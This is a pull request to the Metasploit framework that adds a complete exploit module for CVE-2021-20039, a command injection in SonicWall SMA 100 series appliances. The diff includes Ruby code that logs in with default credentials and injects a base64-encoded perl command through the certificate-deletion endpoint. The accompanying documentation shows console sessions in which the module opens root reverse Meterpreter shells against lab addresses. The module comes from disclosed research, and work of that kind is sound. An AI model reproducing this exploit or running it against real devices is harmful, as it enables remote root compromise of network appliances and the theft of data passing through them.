### PR TITLE
CVE-2021-20039: Authenticated Command Injection SMA-100 Series

### DIFF
--- a/documentation/modules/exploit/linux/http/sonicwall_cve_2021_20039.md
+++ b/documentation/modules/exploit/linux/http/sonicwall_cve_2021_20039.md
@@ -1,0 +1,136 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an authenticated command injection vulnerability in the SonicWall
+SMA 100 series web interface. Exploitation results in command execution as root. The
+affected versions are:
+
+* 10.2.1.2-24sv and below
+* 10.2.0.8-37sv and below
+* 9.0.0.11-31sv and below
+
+### Installation
+
+#### SonicWall SMA 500v 10.2.1.0-sv17 on VMWare Fusion
+
+* Download 10.2.1.0-sv17 from: https://software.sonicwall.com/Firmware/sw_smavm_eng_10.2.1.0_10.2.1_p_17sv_1268045.ova
+* From Fusion, import the downloaded ova.
+* Start the VM.
+* Log in to the command line interface using "admin" and "password".
+* Hit "1" for "Setup Wizard".
+* Configure the device with an appropriate address, gateway, and netmask (the device doesn't use DHCP).
+* Done!
+
+## Verification Steps
+
+* Follow the above instructions to install SMA 500v
+* Do: `use exploit/linux/http/sonicwall_cve_2021_20039`
+* Do: `set RHOST <ip>`
+* Do: `check`
+* Verify the remote target is flagged as vulnerable
+* Do: `set LHOST <ip>`
+* Do: `exploit`
+* You should get a Meterpreter session.
+
+## Options
+
+### USERNAME
+
+The username to authenticate to the web server with. The default value is "admin".
+
+### PASSWORD
+
+The password to authenticate to the web server with. The default value is "password".
+
+### PORTALNAME
+
+The name of the SMA portal to authenticate to. The default value is "VirtualOffice".
+
+### SWDOMAIN
+
+The name of the domain to authenticate to. The default is "LocalDomain".
+
+## Scenarios
+
+### SMA 500v 10.2.1.1-19sv. Default creds. Get Meterpreter session.
+
+```
+msf6 > use exploit/linux/http/sonicwall_cve_2021_20039
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/sonicwall_cve_2021_20039) > set RHOST 10.0.0.7
+RHOST => 10.0.0.7
+msf6 exploit(linux/http/sonicwall_cve_2021_20039) > check
+
+[*] Version found: 10.2.1.1-19sv
+[*] 10.0.0.7:443 - The target appears to be vulnerable. Based on the discovered version.
+msf6 exploit(linux/http/sonicwall_cve_2021_20039) > set LHOST 10.0.0.9
+LHOST => 10.0.0.9
+msf6 exploit(linux/http/sonicwall_cve_2021_20039) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.9:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Version found: 10.2.1.1-19sv
+[+] The target appears to be vulnerable. Based on the discovered version.
+[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
+[*] Authentication successful
+[*] Command Stager progress -   1.42% done (36/2533 bytes)
+- truncated -
+[*] Command Stager progress -  98.07% done (2484/2533 bytes)
+[*] Sending stage (984904 bytes) to 10.0.0.7
+[*] Meterpreter session 2 opened (10.0.0.9:4444 -> 10.0.0.7:58293 ) at 2021-11-17 10:56:30 -0800
+[*] Command Stager progress -  99.37% done (2517/2533 bytes)
+[*] Command Stager progress - 100.00% done (2533/2533 bytes)
+
+meterpreter > getuid
+Server username: root
+meterpreter > shell
+Process 6708 created.
+Channel 1 created.
+uname -a
+Linux sslvpn 3.13.3 #1 SMP Mon Aug 9 11:13:43 GMT 2021 i686 i686 i386 GNU/Linux
+id
+uid=0(root) gid=99(nobody) groups=0(root),99(nobody)
+```
+
+### SMA 500v 9.0.0.10-28sv. Non-default creds. Get Meterpreter session.
+
+```
+msf6 > use exploit/linux/http/sonicwall_cve_2021_20039
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/sonicwall_cve_2021_20039) > set RHOST 10.0.0.6
+RHOST => 10.0.0.6
+msf6 exploit(linux/http/sonicwall_cve_2021_20039) > check
+
+[*] Version found: 9.0.0.10-28sv
+[*] 10.0.0.6:443 - The target appears to be vulnerable. Based on the discovered version.
+msf6 exploit(linux/http/sonicwall_cve_2021_20039) > set LHOST 10.0.0.9
+LHOST => 10.0.0.9
+msf6 exploit(linux/http/sonicwall_cve_2021_20039) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/sonicwall_cve_2021_20039) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.9:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Version found: 9.0.0.10-28sv
+[+] The target appears to be vulnerable. Based on the discovered version.
+[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
+[*] Authentication successful
+[*] Command Stager progress -   1.42% done (36/2533 bytes)
+- Truncated -
+[*] Command Stager progress -  98.07% done (2484/2533 bytes)
+[*] Sending stage (984904 bytes) to 10.0.0.6
+[*] Meterpreter session 1 opened (10.0.0.9:4444 -> 10.0.0.6:38833 ) at 2021-11-17 11:00:29 -0800
+[*] Command Stager progress -  99.37% done (2517/2533 bytes)
+[*] Command Stager progress - 100.00% done (2533/2533 bytes)
+
+meterpreter > getuid
+Server username: root
+meterpreter > shell
+Process 24220 created.
+Channel 1 created.
+uname -a
+Linux sslvpn 3.1.0 #1 SMP Thu Feb 18 15:44:36 GMT 2021 i686 i686 i386 GNU/Linux
+id
+uid=0(root) gid=99(nobody) groups=0(root),99(nobody)
+```

--- a/modules/exploits/linux/http/sonicwall_cve_2021_20039.rb
+++ b/modules/exploits/linux/http/sonicwall_cve_2021_20039.rb
@@ -1,0 +1,177 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SonicWall SMA 100 Series Authenticated Command Injection',
+        'Description' => %q{
+          This module exploits an authenticated command injection vulnerability
+          in the SonicWall SMA 100 series web interface. Exploitation results in
+          command execution as root. The affected versions are:
+
+          - 10.2.1.2-24sv and below
+          - 10.2.0.8-37sv and below
+          - 9.0.0.11-31sv and below
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'jbaines-r7' # Vulnerability discovery and Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2021-20039' ],
+          [ 'URL', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026'],
+        ],
+        'DisclosureDate' => '2021-12-14',
+        'Platform' => ['linux'],
+        'Arch' => [ARCH_X86],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'echo', 'printf' ]
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'PrependFork' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
+      OptString.new('PASSWORD', [true, 'The password to authenticate with', 'password']),
+      OptString.new('SWDOMAIN', [true, 'The domain to log in to', 'LocalDomain']),
+      OptString.new('PORTALNAME', [true, 'The portal to log in to', 'VirtualOffice'])
+    ])
+  end
+
+  ##
+  # Extract the version number from a javascript include in the login landing page.
+  # And compare the version against known affected. Affected versions are:
+  #
+  # 10.2.1.2-24sv and below
+  # 10.2.0.8-37sv and below
+  # 9.0.0.11-31sv and below
+  ##
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/cgi-bin/welcome'),
+      'agent' => 'SonicWALL Mobile Connect'
+    })
+    return CheckCode::Unknown('Failed to retrieve the version information') unless res&.code == 200
+
+    version = res.body.match(/\.([0-9.\-a-z]+)\.js" type=/)
+    return CheckCode::Unknown('Failed to retrieve the version information') unless version
+
+    version = version[1]
+
+    major, minor, revision, build = version.split('.', 4)
+    build, point = build.split('-', 2)
+    print_status("Version found: #{major}.#{minor}.#{revision}.#{build}-#{point}")
+    point.delete_suffix('sv')
+
+    case major
+    when '9'
+      return CheckCode::Safe unless minor.to_i == 0 && revision.to_i == 0 && build.to_i <= 11 && point.to_i <= 31
+    when '10'
+      return CheckCode::Safe unless minor.to_i == 2
+
+      case revision
+      when '0'
+        return CheckCode::Safe unless build.to_i <= 8 && point.to_i <= 37
+      when '1'
+        return CheckCode::Safe unless build.to_i <= 2 && point.to_i <= 24
+      else
+        return CheckCode::Safe
+      end
+    else
+      return CheckCode::Safe
+    end
+    CheckCode::Appears('Based on the discovered version.')
+  end
+
+  def login
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/cgi-bin/userLogin'),
+      'agent' => 'SonicWALL Mobile Connect',
+      'vars_post' =>
+      {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'domain' => datastore['SWDOMAIN'],
+        'portalname' => datastore['PORTALNAME'],
+        'login' => 'true',
+        'verifyCert' => '0',
+        'ajax' => 'true'
+      },
+      'keep_cookies' => true
+    })
+
+    fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200
+    fail_with(Failure::NoAccess, 'Login failed') unless res.get_cookies.include?('swap=')
+    print_good('Authentication successful')
+  end
+
+  ##
+  # Send the exploit in the "CERT" field when "deleting" a certificate. The
+  # backend requires the payload start with "n". Also, there is a very small
+  # amount of space to fit the command into (otherwise we'll trigger a bof).
+  # Finally! The command has a lot of disallowed characters: /$&|>;`^. Which
+  # is problematically for basically all the payloads. The system also is
+  # missing useful tools like wget, base64, and curl (10.2 has curl but
+  # whatever). As such, it seemed the easiest thing to do is wrap the entire
+  # command in base64 and then use perl to decode/execute it.
+  ##
+  def execute_command(cmd, _opts = {})
+    cmd_encoded = Rex::Text.encode_base64(cmd)
+    perl_eval = "n\nperl -MMIME::Base64 -e 'system(decode_base64(\"#{cmd_encoded}\"))'"
+
+    multipart_form = Rex::MIME::Message.new
+    multipart_form.add_part('delete', nil, nil, 'form-data; name="buttontype"')
+    multipart_form.add_part(perl_eval, nil, nil, 'form-data; name="CERT"')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/cgi-bin/viewcert'),
+      'agent' => 'SonicWALL Mobile Connect',
+      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
+      'data' => multipart_form.to_s
+    }, 5)
+
+    if res && res.code != 200
+      # the response should always be 200, unless meterpreter holds the
+      # connection open.
+      fail_with(Failure::UnexpectedReply, 'Only expected 200 OK')
+    end
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    login
+    execute_cmdstager(linemax: 40)
+  end
+end

--- a/modules/exploits/linux/http/sonicwall_cve_2021_20039.rb
+++ b/modules/exploits/linux/http/sonicwall_cve_2021_20039.rb
@@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           [ 'CVE', '2021-20039' ],
           [ 'URL', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026'],
-          [ 'URL', 'https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2']
+          [ 'URL', 'https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2'],
+          [ 'URL', 'https://attackerkb.com/topics/9szJhq46lw/cve-2021-20039/rapid7-analysis']
         ],
         'DisclosureDate' => '2021-12-14',
         'Platform' => ['linux'],

--- a/modules/exploits/linux/http/sonicwall_cve_2021_20039.rb
+++ b/modules/exploits/linux/http/sonicwall_cve_2021_20039.rb
@@ -31,6 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           [ 'CVE', '2021-20039' ],
           [ 'URL', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026'],
+          [ 'URL', 'https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2']
         ],
         'DisclosureDate' => '2021-12-14',
         'Platform' => ['linux'],


### PR DESCRIPTION
## Description

This module exploits an authenticated command injection vulnerability in SonicWall SMA 100 series systems. The vulnerability exists because the SMA 100 series failed to filter "\n" as a special character, allowing an attacker to bypass "safe" command checking and insert their own commands. This module exploits the certificate endpoint because it executes with escalated privileges (`root`) whereas most the web interface executes as `nobody`.

This exploit is challenged by the fact that normal shell metacharacters (`>|&; etc) **are** filtered and the space for exploitation is relatively small. 

At the time of writing, we believe the affected versions are:

* 10.2.1.2-24sv and below
* 10.2.0.8-37sv and below
* 9.0.0.11-31sv and below

Note that the R7 blog and AKB entry aren't live quite yet, but should be on Jan 11 ~9am.

## Verification

List the steps needed to make sure this thing works

- [ ]  Follow the above instructions to install SMA 500v
- [ ]  Start `msfconsole`
- [ ]  `use exploit/linux/http/sonicwall_cve_2021_20039`
- [ ]  `set RHOST <ip>`
- [ ]  `check`
- [ ]  **Verify** the remote target is flagged as vulnerable
- [ ]  `set LHOST <ip>`
- [ ]  `set LPORT <port>`
- [ ]  `exploit`
- [ ] **Verify** you get a Meterpreter session.

